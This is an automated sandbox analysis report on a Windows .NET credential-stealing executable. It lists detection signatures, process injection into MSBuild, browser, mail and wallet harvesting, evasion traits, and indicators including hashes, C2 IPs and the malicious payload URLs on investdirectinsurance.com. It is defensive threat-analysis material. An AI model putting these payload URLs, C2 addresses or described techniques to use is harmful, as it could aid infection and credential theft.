Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
d34e1p5zD2.exe

Overview

General Information

Sample name:d34e1p5zD2.exe
renamed because original name is a hash value
Original sample name:3992e860c4c048741356c0403e3ac9ab84094249515a98c06e255b3bb256eb68.exe
Analysis ID:1483414
MD5:53c82aade0f798222f64759c56d0fa4d
SHA1:d14d3bf34129eaefcfeac6ff8e677eb74bbdf610
SHA256:3992e860c4c048741356c0403e3ac9ab84094249515a98c06e255b3bb256eb68
Tags:exeinvestdirectinsurance-com
Infos:

Detection

Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Sigma detected: Silenttrinity Stager Msbuild Activity
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • d34e1p5zD2.exe (PID: 7060 cmdline: "C:\Users\user\Desktop\d34e1p5zD2.exe" MD5: 53C82AADE0F798222F64759C56D0FA4D)
    • MSBuild.exe (PID: 3116 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
      • conhost.exe (PID: 3920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WMIC.exe (PID: 4164 cmdline: "wmic" csproduct get UUID MD5: E2DE6500DE1148C7F6027AD50AC8B891)
        • conhost.exe (PID: 5044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000002.00000002.4558454375.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000000.00000002.2129759633.0000000012549000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000002.00000002.4564261555.0000000002B64000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: d34e1p5zD2.exe PID: 7060JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: MSBuild.exe PID: 3116JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            SourceRuleDescriptionAuthorStrings
            0.2.d34e1p5zD2.exe.12549ac0.3.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              2.2.MSBuild.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                0.2.d34e1p5zD2.exe.12549ac0.3.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

                  System Summary

                  barindex
                  Source: Network ConnectionAuthor: Kiran kumar s, oscd.community: Data: DestinationIp: 34.117.59.81, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 3116, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49723
                  No Snort rule has matched
                  Timestamp:2024-07-27T11:37:06.874456+0200
                  SID:2803270
                  Source Port:49722
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Potentially Bad Traffic
                  Timestamp:2024-07-27T11:38:02.067536+0200
                  SID:2022930
                  Source Port:443
                  Destination Port:49735
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-27T11:37:05.608206+0200
                  SID:2803270
                  Source Port:49721
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Potentially Bad Traffic
                  Timestamp:2024-07-27T11:37:24.558669+0200
                  SID:2022930
                  Source Port:443
                  Destination Port:49728
                  Protocol:TCP
                  Classtype:A Network Trojan was detected

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: d34e1p5zD2.exeReversingLabs: Detection: 13%
                  Source: d34e1p5zD2.exeVirustotal: Detection: 13%Perma Link
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49730 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 40.126.32.140:443 -> 192.168.2.5:49713 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.102:443 -> 192.168.2.5:49721 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.5:49723 version: TLS 1.2
                  Source: d34e1p5zD2.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\Users\frede\OneDrive\Ambiente de Trabalho\Outputs\Ejicaj.pdb@ source: d34e1p5zD2.exe
                  Source: Binary string: C:\Users\frede\OneDrive\Ambiente de Trabalho\Outputs\Ejicaj.pdb source: d34e1p5zD2.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 011B4A74h2_2_011B4868
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 011B4A87h2_2_011B4868
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 05C08364h2_2_05C07FB8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h2_2_05C0C108
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h2_2_05C054D4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h2_2_05C054E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 05D004F2h2_2_05D00440
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 05D004F2h2_2_05D00448
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov eax, dword ptr [ebp-28h]2_2_05D0DABF
                  Source: global trafficTCP traffic: 192.168.2.5:49724 -> 46.23.108.235:6060
                  Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
                  Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
                  Source: Joe Sandbox ViewASN Name: GOOGLE-AS-APGoogleAsiaPacificPteLtdSG GOOGLE-AS-APGoogleAsiaPacificPteLtdSG
                  Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
                  Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                  Source: unknownDNS query: name: ipinfo.io
                  Source: global trafficHTTP traffic detected: GET /assuence/litesolidCha/Victim_SID.bd HTTP/1.1User-Agent: Mozilla/5.0Host: investdirectinsurance.comCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /assuence/litesolidCha/Roozpiso.bd HTTP/1.1User-Agent: Mozilla/5.0Host: investdirectinsurance.comCache-Control: no-cache
                  Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49730 version: TLS 1.0
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.140
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.140
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.140
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.140
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.140
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.140
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.140
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.140
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.140
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.140
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.140
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.140
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.140
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.140
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.140
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.140
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.140
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.140
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.140
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.140
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.140
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.140
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.140
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.140
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.140
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.140
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.140
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.140
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.140
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.140
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.140
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.140
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.23.108.235
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.23.108.235
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.23.108.235
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.23.108.235
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.23.108.235
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.23.108.235
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeCode function: 0_2_00007FF848D706C2 InternetReadFile,0_2_00007FF848D706C2
                  Source: global trafficHTTP traffic detected: GET /assuence/litesolidCha/Victim_SID.bd HTTP/1.1User-Agent: Mozilla/5.0Host: investdirectinsurance.comCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /assuence/litesolidCha/Roozpiso.bd HTTP/1.1User-Agent: Mozilla/5.0Host: investdirectinsurance.comCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: investdirectinsurance.com
                  Source: global trafficDNS traffic detected: DNS query: ipinfo.io
                  Source: MSBuild.exe, 00000002.00000002.4564261555.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: d34e1p5zD2.exeString found in binary or memory: https://collection.hubanalytics.io/
                  Source: d34e1p5zD2.exe, 00000000.00000002.2129759633.0000000012549000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.4558454375.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.4564261555.0000000002B64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/users/
                  Source: d34e1p5zD2.exe, 00000000.00000002.2127578766.0000000000588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://investdirectinsurance.com/K
                  Source: d34e1p5zD2.exeString found in binary or memory: https://investdirectinsurance.com/assuence/litesolidCha/Roozpiso.bd
                  Source: d34e1p5zD2.exeString found in binary or memory: https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bd
                  Source: d34e1p5zD2.exe, 00000000.00000002.2127578766.000000000052C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bd#
                  Source: d34e1p5zD2.exe, 00000000.00000002.2127578766.000000000052C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bdE
                  Source: d34e1p5zD2.exe, 00000000.00000002.2127578766.000000000052C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bdo
                  Source: d34e1p5zD2.exe, 00000000.00000002.2127578766.0000000000588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://investdirectinsurance.com/y
                  Source: d34e1p5zD2.exe, 00000000.00000002.2129759633.0000000012549000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.4558454375.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.4564261555.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/json
                  Source: MSBuild.exe, 00000002.00000002.4564261555.0000000002B64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/missingauth
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                  Source: unknownHTTPS traffic detected: 40.126.32.140:443 -> 192.168.2.5:49713 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.102:443 -> 192.168.2.5:49721 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.5:49723 version: TLS 1.2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
